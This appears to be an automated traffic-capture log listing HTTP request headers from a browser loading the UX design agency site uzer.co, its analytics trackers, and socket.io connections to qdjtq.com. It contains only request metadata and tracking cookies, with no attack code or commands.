Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port6.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/Sly/1.6.1/sly.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-05.svg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/design-thinking-home.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/lean-ux-home.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/design-sprints-home.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port4.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=yXWikhQOZczjci5kAHuJ HTTP/1.1Host: qdjtq.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://qdjtq.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: b3Wd5GB9IcUbMmd6PEvSZA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mupC9&sid=yXWikhQOZczjci5kAHuJ HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muoqp HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/verificado-clutch.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/imagen-blog-01.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/imagen-blog-02.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /22144436.js HTTP/1.1Host: js.hs-scripts.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/imagen-blog-03.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/wp_icon.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-04.svg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/logos-clientes1.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/logos-clientes2.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/main.js HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port1-m.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port2-m.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port3-m.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port4-m.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-94GBDVKM3R&gacid=228618068.1727397051&gtm=45je49p0v867598331za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&_ng=1&aip=1&fledge=1&frm=0&tag_exp=101671035~101747727&z=1522954775 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /c/hotjar-3513970.js?sv=6 HTTP/1.1Host: static.hotjar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /td/rul/10981864615?random=1727397050580&cv=11&fst=1727397050580&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /td/rul/10981864615?random=1727397050638&cv=11&fst=1727397050638&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&label=V20XCPG92OMDEKfpx_Qo&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&gtm_ee=1&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=event%3Dconversion&ct_cookie_present=0 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /22144436.js HTTP/1.1Host: js.hs-scripts.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port7.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/velocity.min.js HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port5-m.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mupdY&sid=yXWikhQOZczjci5kAHuJ HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mupAe&sid=yXWikhQOZczjci5kAHuJ HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mupC9&sid=yXWikhQOZczjci5kAHuJ HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/expandable.js HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port6-m.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/port7-m.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/header_lk.svg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/header_ins.svg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /js/modernizr.js HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/header_fb.svg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
